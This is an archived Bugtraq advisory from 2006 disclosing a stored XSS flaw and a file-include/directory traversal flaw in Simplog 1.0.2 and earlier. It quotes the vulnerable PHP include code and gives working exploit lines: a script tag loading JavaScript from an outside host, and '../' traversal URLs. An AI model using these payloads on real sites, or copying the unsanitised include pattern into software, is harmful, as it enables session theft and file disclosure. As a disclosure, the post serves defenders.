Bugtraq mailing list archives

Simplog <= 1.0.2 Vulnerabilities

From: retard () 30gigs com
Date: 4 Mar 2006 17:46:40 -0000

ORIGIONAL SOURCE: http://notlegal.ws/simplogsploit.txt

summary
        software: simplog
        vendors website: http://daverave.64digits.com/home.php?page=simplog
        versions: <= 1.0.2
        class: remote
        status: unpatched
        exploit: available
        solution: not available
        discovered by: retard and jim
        risk level: medium

 description
        simplog does not sanatise blog posts allowing users to insert
        html into posts causing a xss vulnerability. also, the application
        uses global variables for includes allowing users to include 
        other .txt files than the inteded target
        
        in index.php:
42      $act = $_GET['act']; 
43      if ($act == '')
44      {
45      include("blog.txt");
46      }
47      else
48      {
49      include("act/$act.txt");
50      } 

 exploit(s)
        xss:
        make any of your blog posts contain a script like below
        <SCRIPT SRC=http://notlegal.ws/xss.js></SCRIPT>

        directory transversal:
        http://example.com/index.php?act=blog&blogid=../somefile
        http://example.com/index.php?act=../somefile

 credit
        author(s): retard and jim
        email: retard () 30gigs com

Current thread:

Simplog <= 1.0.2 Vulnerabilities retard (Mar 04)